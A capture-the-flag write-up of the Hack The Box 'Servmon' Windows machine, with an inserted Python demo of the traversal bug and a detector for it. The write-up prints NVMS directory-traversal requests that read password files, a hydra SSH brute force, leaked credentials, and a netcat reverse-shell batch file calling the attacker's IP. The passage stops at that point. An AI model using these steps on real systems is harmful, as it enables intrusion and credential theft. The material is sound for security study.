Servmon is a recently retired box (11 Apr – 20 Jun) and though marked Easy it didn’t feel as easy as earlier Windows boxes, largely because of power creep; boxes become more difficult over time while retaining the same difficulty rating. The other problem was how unstable the box was; for some reason some ports weren’t marked open even though they should be. I found this only after I checked online and saw others encountered the same problem. Without those running services, the box is unexploitable. Fortunately after I switched regions I could find those running services and proceed.
When doing this box you may find that Chromium loads quicker than Firefox on Kali, so I installed it.
Lessons learned
- (Unintended) differences between HTB regions for the same box
- amap being too old to reliably trust
- Post-exploitation enumeration restrictions on recent Windows builds
- Dealing with Windows AV for file-transfer
Enumeration
This was what I saw in the first region
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-29 16:46:51 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49667/tcp on 10.10.10.184
Discovered open port 135/tcp on 10.10.10.184
Discovered open port 445/tcp on 10.10.10.184
Discovered open port 5040/tcp on 10.10.10.184
Discovered open port 49666/tcp on 10.10.10.184
Discovered open port 49668/tcp on 10.10.10.184
Discovered open port 5666/tcp on 10.10.10.184
Discovered open port 7680/tcp on 10.10.10.184
Discovered open port 49665/tcp on 10.10.10.184
Discovered open port 21/tcp on 10.10.10.184
Discovered open port 49664/tcp on 10.10.10.184
Discovered open port 49669/tcp on 10.10.10.184
Discovered open port 8443/tcp on 10.10.10.184
Discovered open port 22/tcp on 10.10.10.184
Discovered open port 49670/tcp on 10.10.10.184
After switching regions, port 80 appears.
root@Kali:~/HTB/Servmon# masscan -p1-65535,U:1-65535 10.10.10.184 --rate=600 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-08-30 06:26:37 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 7680/tcp on 10.10.10.184
Discovered open port 49667/tcp on 10.10.10.184
Discovered open port 49669/tcp on 10.10.10.184
Discovered open port 49670/tcp on 10.10.10.184
Discovered open port 5666/tcp on 10.10.10.184
Discovered open port 8443/tcp on 10.10.10.184
Discovered open port 445/tcp on 10.10.10.184
Discovered open port 80/tcp on 10.10.10.184
Discovered open port 139/tcp on 10.10.10.184
Discovered open port 49664/tcp on 10.10.10.184
Discovered open port 49668/tcp on 10.10.10.184
Discovered open port 135/tcp on 10.10.10.184
Discovered open port 49665/tcp on 10.10.10.184
Discovered open port 21/tcp on 10.10.10.184
Discovered open port 22/tcp on 10.10.10.184
Discovered open port 5040/tcp on 10.10.10.184
Discovered open port 6063/tcp on 10.10.10.184
Discovered open port 49666/tcp on 10.10.10.184
Discovered open port 6699/tcp on 10.10.10.184
I spent a lot of time applying the right exploits to the wrong port only to discover this. The running services and ports are here.
FTP
We see an FTP server running, so run nmap’s FTP scripts against it.
root@Kali:~/HTB/Servmon# nmap -Pn -n -sV -p21 --script=ftp* 10.10.10.184 -e tun0
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 01:14 +08
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Nmap scan report for 10.10.10.184
Host is up (0.0053s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       Users
| ftp-brute:
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 93 seconds, average tps: 537.1
| ftp-syst:
|_  SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.50 seconds
This tells us anonymous access is allowed. So I logged in, found some notes and downloaded them.
root@Kali:~/HTB/Servmon# ftp -p 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
257 "/" is current directory.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,11).
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,12).
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       Nadine
01-18-20  12:08PM       Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,15).
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> mget Confidential.txt
mget Confidential.txt? Y
227 Entering Passive Mode (10,10,10,184,194,20).
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.00 secs (35.9851 kB/s)
ftp> cd ..
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,21).
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       Nadine
01-18-20  12:08PM       Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,184,194,22).
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp> mget "Notes to do.txt"
mget Notes to do.txt? Y
227 Entering Passive Mode (10,10,10,184,194,24).
125 Data connection already open; Transfer starting.
226 Transfer complete.
Apart from these I also tested whether directory traversal was possible with cd ../../../../; nope, it didn't work. The notes read (with added newlines):
root@Kali:~/HTB/Servmon# cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
root@Kali:~/HTB/Servmon# cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Ok, so we know a few things. First, there's a Passwords.txt on Nathan's desktop which we can't get to with anonymous FTP (I tried dir -a). Then we see references to NVMS and NSClient, a clue to what software may be running.
SMB
Couldn't find anything here. No null sessions were available. Afternote: when I was done with the box and watched IppSec's video, he shows that the discovered passwords worked with SMB.
root@Kali:~/HTB/Servmon# smbmap -H 10.10.10.184
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on 10.10.10.184
root@Kali:~/HTB/Servmon# smbclient --no-pass -L //10.10.10.184
WARNING: The "syslog" option is deprecated
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_ACCESS_DENIED
Web services
Port 8443
I tried 8443 first (since I didn't discover 80 until later) and found that amap (which was pretty old) didn't identify this Web service properly:
root@Kali:~/HTB/Servmon# amap 10.10.10.184 8443
amap v5.4 (www.thc.org/thc-amap) started at 2020-08-30 01:34:25 - APPLICATION MAPPING mode

Unidentified ports: 10.10.10.184:8443/tcp (total 1).

amap v5.4 finished at 2020-08-30 01:34:31
root@Kali:~/HTB/Servmon# curl http://10.10.10.184:8443/
curl: (56) Recv failure: Connection reset by peer
Nor did curl get redirected to the HTTPS website. But if you explicitly enter https://10.10.10.184:8443 you'll see this
Strangely there's no username required, and I tried some obvious passwords like nadine, nathan, servmon, admin, password etc., none of which worked. Googling NSClient tells us it's a monitoring agent, which fits the name Servmon pretty well. I couldn't find any default passwords to use for NSClient either. searchsploit returns this:
root@Kali:~/HTB/Servmon# searchsploit nsclient
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution    | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                   | windows/local/46802.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
But neither appears relevant; we don’t have creds nor are we already in. dirbuster hung when I tried, and anyway it didn’t find much.
Port 80
Page loaded this
Similarly we don't have any passwords and, in any case, Nathan's note says they've been changed. searchsploit returned something interesting:
root@Kali:~/HTB/Servmon# searchsploit nvms
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal                                    | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification   | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                 | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                | hardware/webapps/48311.py
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
The last result, a Python exploit, was published a day after the box was released, so it's probably not right to use it since it would have been written just for the box. It seemed to be an automated version of the first result though. We can try this in Burp Repeater:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: dataPort=6063
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-type:
Content-Length: 92
Connection: close
AuthInfo:

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Ok, we managed to do an LFI on Windows. Now what would be interesting is what we could view. Nadine's note says that Passwords.txt was on Nathan's desktop.
GET /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: dataPort=6063
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
We got a bunch of passwords. I tried them with the NSClient login, but none succeeded. Now, although not necessary at this stage, I had a look at the earlier privilege escalation exploit for NSClient; it says the Web administrator password is in c:\program files\nsclient++\nsclient.ini, so I used the LFI vulnerability to view it. We can see the password, and also understand why the login returned a 403 not allowed error instead: only localhost is allowed to log in.
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
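As an added example (not from the write-up or from the NVMS-1000 code), here is the path-handling mistake behind the traversal above modelled in Python, next to a hardened resolver and a small access-log check that flags the same requests. The web root, server layout and log lines are constructed for the demo; NVMS-1000's real document root is not shown on the page.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed web root for the demo (drive letter omitted so posixpath can be used).
WEB_ROOT = "/Program Files/NVMS-1000/www"

# The two traversal requests sent through Burp in the write-up.
WIN_INI_REQUEST = "/../../../../../../../../../../../../windows/win.ini"
PASSWORDS_REQUEST = "/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt"


def decode_request_path(raw_path: str) -> str:
    """Strip the query string, percent-decode twice (catches %252e double
    encoding) and treat backslashes as separators, as Windows servers do."""
    path = raw_path.split("?", 1)[0]
    path = unquote(unquote(path))
    return path.replace("\\", "/")


def vulnerable_resolve(raw_path: str) -> str:
    """The bug pattern: glue the request path onto the web root and let the
    filesystem collapse the '..' segments. Twelve '../' walk out of the root."""
    return posixpath.normpath(WEB_ROOT + "/" + decode_request_path(raw_path).lstrip("/"))


def safe_resolve(raw_path: str) -> str:
    """Hardened version: normalise first, then refuse anything whose final
    location is not inside WEB_ROOT. Raises PermissionError on traversal."""
    rel = posixpath.normpath(decode_request_path(raw_path).lstrip("/"))
    full = posixpath.normpath(posixpath.join(WEB_ROOT, rel))
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        raise PermissionError(f"path escapes web root: {raw_path!r}")
    return full


def is_traversal(raw_path: str) -> bool:
    """True when safe_resolve would reject the request."""
    try:
        safe_resolve(raw_path)
    except PermissionError:
        return True
    return False


# Constructed access-log lines (combined log format) for the detection demo.
SAMPLE_LOG = [
    '10.10.14.18 - - [30/Aug/2020:01:40:12 +0800] "GET /index.html HTTP/1.1" 200 1523',
    '10.10.14.18 - - [30/Aug/2020:01:41:03 +0800] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92',
    '10.10.14.18 - - [30/Aug/2020:01:41:40 +0800] "GET /%2e%2e/%2e%2e/%2e%2e/users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156',
    '10.10.10.50 - - [30/Aug/2020:01:42:09 +0800] "GET /css/../style.css HTTP/1.1" 200 402',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_traversal_requests(log_lines):
    """Return (client, path, status) for every request that escapes the web
    root. Encoded dot segments are caught because is_traversal decodes them;
    '/css/../style.css' stays inside the root and is not flagged."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if is_traversal(path):
            hits.append((client, path, int(status)))
    return hits


if __name__ == "__main__":
    print("vulnerable resolve:", vulnerable_resolve(WIN_INI_REQUEST))
    print("hardened rejects:  ", is_traversal(WIN_INI_REQUEST))
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", hit)
```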
Exploitation – SSH login
We still have SSH to test. This is an odd service to find running on Windows, but anyway. We have two usernames and a list of passwords, so let's use hydra to brute-force SSH logins; hopefully it doesn't lock us out.
root@Kali:~/HTB/Servmon# cat users.txt
Nadine
Nathan
root@Kali:~/HTB/Servmon# cat Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
root@Kali:~/HTB/Servmon# hydra -L users.txt -P Passwords.txt 10.10.10.184 -t 4 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 17:53:59
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14 login tries (l:2/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-30 17:54:03
root@Kali:~/HTB/Servmon# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>
Great, we're in. Getting winPEAS to run was quite a headache. I found quickly that commands like systeminfo and tasklist were blocked
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist
ERROR: Access denied
which is something increasingly true of newer Windows boxes. Ok, let's check the .NET version:
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir C:\Windows\Microsoft.NET\Framework
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Windows\Microsoft.NET\Framework

19/03/2019  05:52    <DIR>          .
19/03/2019  05:52    <DIR>          ..
19/03/2019  05:46             7,680 sbscmp10.dll
19/03/2019  05:46             7,680 sbscmp20_mscorwks.dll
19/03/2019  05:46             7,680 sbscmp20_perfcounter.dll
19/03/2019  05:46             7,680 sbs_diasymreader.dll
19/03/2019  05:46             7,680 sbs_microsoft.jscript.dll
19/03/2019  05:46             7,680 sbs_mscordbi.dll
19/03/2019  05:46             7,680 sbs_mscorrc.dll
19/03/2019  05:46             7,680 sbs_mscorsec.dll
19/03/2019  05:46             7,680 sbs_system.configuration.install.dll
19/03/2019  05:46             7,680 sbs_system.data.dll
19/03/2019  05:46             7,680 sbs_system.enterpriseservices.dll
19/03/2019  05:46             7,680 sbs_wminet_utils.dll
19/03/2019  05:46             7,680 SharedReg12.dll
08/04/2020  23:21    <DIR>          v1.0.3705
08/04/2020  23:21    <DIR>          v1.1.4322
19/03/2019  05:52    <DIR>          v2.0.50727
30/08/2020  07:36    <DIR>          v4.0.30319
              13 File(s)         99,840 bytes
               6 Dir(s)  27,495,735,296 bytes free
4.0, so we have to use an older compiled winPEAS (the current build requires 4.5). Here I encountered a bunch of problems: I couldn't download winPEAS with certutil or transfer it with smbserver.py because Windows antivirus blocked it. What worked was what I discovered with Anthem here, namely FTP download.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ftp
ftp> open 10.10.14.18
Connected to 10.10.14.18.
220 pyftpdlib 1.2.0 ready.
530 Log in with USER and PASS first.
User (10.10.14.18:(none)): anonymous
331 Username ok, send password.
Password:
230 Login successful.
ftp> GET winPEASany.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 237698 bytes received in 0.66Seconds 358.52Kbytes/sec.
ftp> quit
221 Goodbye.
On Kali, run the FTP server:
root@Kali:~/HTB/Servmon# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:262: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 20-08-30 18:31:15] >>> starting FTP server on 0.0.0.0:21, pid=18441 <<<
[I 20-08-30 18:31:15] poller:
[I 20-08-30 18:31:15] masquerade (NAT) address: None
[I 20-08-30 18:31:15] passive ports: None
[I 20-08-30 18:31:15] use sendfile(2): True
[I 20-08-30 18:31:45] 10.10.10.184:49721-[] FTP session opened (connect)
[I 20-08-30 18:31:55] 10.10.10.184:49721-[anonymous] USER 'anonymous' logged in.
[I 20-08-30 18:32:20] 10.10.10.184:49721-[anonymous] RETR /root/HTB/Servmon/winPEASany.exe completed=1 bytes=237698 seconds=0.694
[I 20-08-30 18:32:26] 10.10.10.184:49721-[anonymous] FTP session closed (disconnect).
Here, as SSH provides an interactive shell, we can use FTP directly; otherwise, in a non-interactive remote shell, we can do what was done in Anthem, namely put all the commands in one txt file and run FTP with that as its input. Once I found a way to download files to the box, I hunted for a version of winPEAS which worked. The non-functional ones returned this error:
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEASx64.exe cmd > winpeas.txt
This version of C:\Users\Nadine\AppData\Local\Temp\winPEASx64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
I tried a few more; this one ended up working.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>winPEAS.exe cmd > winpeas.txt

nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\AppData\Local\Temp

30/08/2020  11:37    <DIR>          .
30/08/2020  11:37    <DIR>          ..
30/08/2020  11:24            59,392 nc.exe
30/08/2020  11:37           231,424 winPEAS.exe
30/08/2020  11:38           144,095 winpeas.txt
30/08/2020  11:32           237,698 winPEASany.exe
30/08/2020  11:35           237,186 winPEASx64.exe
               5 File(s)        909,795 bytes
               2 Dir(s)  27,495,587,840 bytes free
Other file transfer methods
I tested other file transfer methods, findings here. In conclusion, stick with PowerShell's DownloadFile method, FTP and scp (if Windows OpenSSH is installed). Unfortunately winPEAS was quite uninformative this time round; it didn't highlight any potentially exploitable vector. If you paid really close attention to non-Microsoft services you might see this:
NSClient++ Monitoring Agent(MySolutions Nordic (Michael Medin) - NSClient++ Monitoring Agent)["C:\Program Files\NSClient++\nscp.exe" service --run --name nscp] - Autoload
    Monitoring agent for nagios (and others) used to respond to status queries
Restricted enumeration
But in general winPEAS had a hard time, because the way it lists services is via PowerShell's Get-Service:
nadine@SERVMON C:\Users\Nadine\Downloads>powershell.exe "Get-Service"
Get-Service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ Get-Service
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
In winPEAS we see:
[X] Exception: Access denied
System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges. ---> System.ComponentModel.Win32Exception: Access is denied
   --- End of inner exception stack trace ---
   at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManagerAccess)
   at System.ServiceProcess.ServiceController.GetDataBaseHandleWithEnumerateAccess(String machineName)
   at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType)
   at System.ServiceProcess.ServiceController.GetServices()
   at d5.c(Dictionary`2 A_0)
   at d4.bs()
Commands like systeminfo and tasklist are restricted as well.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>tasklist
ERROR: Access denied
But some things work in PowerShell, such as Get-Process:
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>Powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine\AppData\Local\Temp>
PS C:\Users\Nadine\AppData\Local\Temp> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    443      25    14560      31028               6252   1 ApplicationFrameHost
    269      13     2464      13444               6704   1 browser_broker
     89       5     2884       4688       0.48     604   0 cmd
    107       6     2572       4424       0.06    4332   0 cmd
    152      10     6728      12708       0.13    6376   0 conhost
    157      10     6700      13004               7728   0 conhost
    110       6     1300       5236       3.70    7956   0 conhost
    619      21     1752       5196                408   0 csrss
    400      17     1612       4756                496   1 csrss
    386      15     3740      13764               4616   1 ctfmon
    256      14     3924      13264               3564   0 dllhost
    789      40    37732      71228                976   1 dwm
   1649      62    24492      93060               5620   1 explorer
     32       7     3404       7656                740   1 fontdrvhost
     32       5     1340       3760                748   0 fontdrvhost
      0       0       60          8                  0   0 Idle
   1157      23     5220      15528                636   0 lsass
    173      15     4224      11460               2752   0 ManagementAgentHost
      0       0      160      10412               1536   0 Memory Compression
    760      45    39012      28220               7464   1 Microsoft.Photos
    835      45    20068      72432               6328   1 MicrosoftEdge
    488      20     5808      25280               7044   1 MicrosoftEdgeCP
    263      13     3832      13000               5328   1 MicrosoftEdgeSH
    221      13     2828       9972               4644   0 msdtc
    739      71   177420     186952               2776   0 MsMpEng
    137       9     1148       8748       0.16    3156   0 nc
    192      33     3392       9264               4400   0 NisSrv
    352      23     7348      19484               2660   0 nscp
   2526     357   347536     118644               8080   1 NVMS-1000
    624      34    96216     108592       4.31    7604   0 powershell
      0      15     4572      26712                 88   0 Registry
    289      17     5416      21996                988   1 RuntimeBroker
    126       8     1516       7408               1564   1 RuntimeBroker
    133       9     1624       8128               2628   1 RuntimeBroker
    407      19     6212      21204               2764   1 RuntimeBroker
    215      11     2500      16016               6160   1 RuntimeBroker
    139       8     1528       7400               6932   1 RuntimeBroker
    269      14     2984      15296               7340   1 RuntimeBroker
    255      16     4860      16324               8136   1 RuntimeBroker
    776      43    19960      28332               2740   0 SearchIndexer
   1072      68    71472     135400               4088   1 SearchUI
    226      11     2736      14996               4224   1 SecurityHealthHost
    410      16     4140      15512               6108   0 SecurityHealthService
    154      10     1704       8828               7812   1 SecurityHealthSystray
    641      11     4952       9592                628   0 services
     89       6     3192       5964               3644   0 SgrmBroker
    574      26    10664      45388               6440   1 ShellExperienceHost
    555      18     6096      24768               3232   1 sihost
     53       3     1148       1036                312   0 smss
    422      21     5108      14748               2076   0 spoolsv
    109      12     1712       6788               2688   0 sshd
    120       9     2136       7044       0.89    6872   0 sshd
    113       9     2040       7180               7716   0 sshd
    588      27    18200      58148                648   1 StartMenuExperienceHost
    157       7     1404       5704                332   0 svchost
    287      13     3188      10832                340   0 svchost
    158      10     1940      12136                596   0 svchost
    214      12     2156      10040                660   0 svchost
     86       5      908       3752                756   0 svchost
   1169      22    11628      28836                828   0 svchost
   1116      17     7048      14252                880   0 svchost
    249      10     2172       7892                924   0 svchost
    198      12     2184      12136                968   0 svchost
    485      28     9328      19108               1032   0 svchost
    415      14    13888      16632               1088   0 svchost
    127       8     1412       7092               1152   0 svchost
    138      19     3848       7796               1176   0 svchost
    206      12     1692       7324               1192   0 svchost
    219      10     2104       7244               1228   0 svchost
    175       7     1248       5588               1352   0 svchost
    226      13     2584      11784               1360   0 svchost
    438       9     2900       8932               1368   0 svchost
    242      12    34076      41512               1376   0 svchost
    389      17     5640      15172               1468   0 svchost
    367      15     4260      11828               1576   0 svchost
    177      11     1864       8292               1600   0 svchost
    267      13     2860       7740               1620   0 svchost
    144       9     1516       6996               1708   0 svchost
    175      10     1948       8064               1728   0 svchost
    363      10     2584       8448               1840   0 svchost
    211      10     1972       8532               1872   0 svchost
    274      16     5564      19500               1884   0 svchost
    190      15     6088       9844               1912   0 svchost
    258      11     2576       9948               1944   0 svchost
    126      10     1540       6252               1956   0 svchost
    358      14     2268       9444               1968   0 svchost
    225      12     2256      10916               2088   0 svchost
    166       9     1772       6992               2124   0 svchost
    428      32     9780      18908               2140   0 svchost
    187      11     1984       8056               2196   0 svchost
    263      13     2604       7700               2392   0 svchost
    166      12     1660       7172               2400   0 svchost
    203      23     2696      10092               2516   0 svchost
    443      22    13944      28348               2524   0 svchost
    344      21    27292      32352               2536   0 svchost
    336      15     4524      11796               2556   0 svchost
    421      16     8440      18568               2576   0 svchost
    286      13     3748      15648               2640   1 svchost
    209      12     2392       8768               2652   0 svchost
    135       9     1552       6380               2672   0 svchost
    128       7     1272       5344               2716   0 svchost
    241      12     3128      17128               2804   0 svchost
    483      18     3500      12724               2876   0 svchost
    136       8     1584       6004               2896   0 svchost
    378      23     3280      12000               3148   0 svchost
    293      17     4192      15044               3256   0 svchost
    307      18     4976      16596               3544   0 svchost
    389      19     6600      39044               4104   1 svchost
    253      13     3116      14520               4292   0 svchost
    180       9     4532      12580               4480   0 svchost
    169       9     1740       7836               4508   0 svchost
    222      13     2880      12304               4528   0 svchost
    340      42     4808      15808               4840   0 svchost
    218      15     1968       7152               5132   0 svchost
    241      12     3012      16132               5672   1 svchost
    399      67    14716      20248               5812   0 svchost
    190      12     2744      14848               6216   0 svchost
    239      13     2852      11952               7120   0 svchost
    227      12     2520       9732               7436   0 svchost
    454      25     5024      20116               7524   1 svchost
    188      10     3192       7660               7896   0 svchost
    120       7     1324       5672               8004   0 svchost
   2565       0      196         64                  4   0 System
    794      36    18324        660               2244   1 SystemSettings
    260      27     4904      13796               4204   1 taskhostw
    269      17     5104      14644               5488   1 taskhostw
    483      21    33228      51996               7748   0 usocoreworker
    178      13     4816      12924               2744   0 VGAuthService
    407      24     9524      21840               2816   0 vmtoolsd
    279      20     4300      16660               7880   1 vmtoolsd
    129       9     1292       6780               5912   1 WatchDog
    156      11     1312       6496                484   0 wininit
    271      13     2908      12924                568   1 winlogon
    524      36    15064        396               5908   1 WinStore.App
    152       9     1564       7604               3528   0 WmiApSrv
    345      16     9744      18636               3844   0 WmiPrvSE
    463      24    12024       5360               7152   1 YourPhone
    240      13     3304      14496               4328   1 YourPhoneServer
winPEAS also highlights that nadine’s Powershell history file is readable, which actually tells us how to escalate privileges (well in hindsight).
Priv esc
Priv esc for this box was quite tough, largely because the exploit write-up was quite difficult to follow (no screenshots or explanation of what was done). Plus, if you read this comment on IppSec's video by the creator of the box, he says that the intended route was actually through some RESTful API call, without even needing to log in to NSClient. Nevertheless IppSec shows how to do it, and this is my summary:
As per the searchsploit results, read through the exploit. We first need to make the NSClient Web app accessible. Noting from nsclient.ini that only 127.0.0.1 is allowed to log in, we need to remote-port-forward it back to Kali, which in effect makes the target service believe we are accessing it from localhost rather than remotely.
nadine@SERVMON C:\Users\Nadine\AppData\Local\Temp>ssh -l root -R 8443:127.0.0.1:8443 root@10.10.14.18
The authenticity of host '10.10.14.18 (10.10.14.18)' can't be established.
ECDSA key fingerprint is SHA256:HRvXIeB7FuR8syEm3D1KDRx6s3O7n4jJQmXw4ald9PA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.14.18' (ECDSA) to the list of known hosts.
root@10.10.14.18's password:
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sun Aug 30 13:15:05 2020 from 192.168.92.1
root@Kali:~#
Then we can run the browser (Chromium works better than Firefox here).
root@Kali:~/HTB/Servmon# chromium --no-sandbox
Navigate to https://localhost:8443 on Kali (note the HTTPS), and login with the password from nsclient.ini (ew2x6SsGTxjRwXOT)
Go to settings -> external scripts -> scripts -> Add new
The "key" field needs to be command and the value needs to be a path to an executable or batch script serving as the payload. In this case we can create a simple .bat file like this (download nc.exe to the target first):
nadine@SERVMON C:\Users\Nadine\Downloads>echo @echo off > evil.bat
nadine@SERVMON C:\Users\Nadine\Downloads>echo C:\Users\Nadine\Downloads\nc.exe 10.10.14.18 443 -e cmd.exe >> evil.bat
nadine@SERVMON C:\Users\Nadine\Downloads>type evil.bat
@echo off
C:\Users\Nadine\Downloads\nc.exe 10.10.14.27 443 -e cmd.exe
